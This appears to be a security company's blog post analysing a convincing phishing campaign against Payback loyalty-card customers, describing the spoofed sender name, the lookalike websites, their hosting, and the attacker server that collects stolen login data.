There have been lots of discussions about couponing and loyalty cards such as Payback. Some find the practise of analyzing your shopping habits disagreeable, others just go hunting for those points and use them for rewards. Now, a few weeks short of christmas, G DATA has uncovered a spam campaign which can end up costing you more than just your virtual points or coupons: your data.
On their website, Payback admits that the emails from the current spam campaign "are well-made, unfortunately". We fully agree with this statement. A look at the sender name could easily fool the reader, because it looks legitimate. It reads "Payback.de Service". On the other hand, legitimate messages from Payback only use "Payback Service" as the sender name. You can find more details on this in the section "Fraud Attempt Indicators". Furthermore, the recipient is addressed correctly. The name is in line with actual data, as is the email address under "Your Payback Account". Save for a few exceptions, the email looks identical to genuine messages from Payback. There are very few indicators for things that are not quite alright and they are difficult to spot:
The two emails direct the reader to two different websites. We admit that the domains are well chosen for the purpose as it is easy to glance over them without suspecting anything:
At the time of the analysis, both domains were hosted on the same server at BlazingFast LLC, a hosting service in the Ukraine. Both websites are exact lookalikes of the genuine Payback website.
The only differences are on the submission form for login data. Any data entered in there will not be sent to Payback but instead to a server controlled by the attacker: www. loginpage .online
This domain is hosted in the USA. Any domain registration details are hidden. The dedicated server is also associated with BlazingFast LLC. A quick search with popular search engines shows that the company does not have an entirely clean record. One can suspect that the attackers are carrying out their phishing activities on hacked webservers. The first domain we mentioned actually hosts the website of a Brazilian vendor for aircon units. The web presence has also been been abused before and is also known for its connection with other phishing attacks (e.g. against customers of a Brazilian bank).
Initially, one might be tempted to shrug it off because, after all, those are just virtual points, so nothing is really lost when something happens to those. This is bad advice, though, because behind this seemingly insignificant account is real information which can even be turned into money.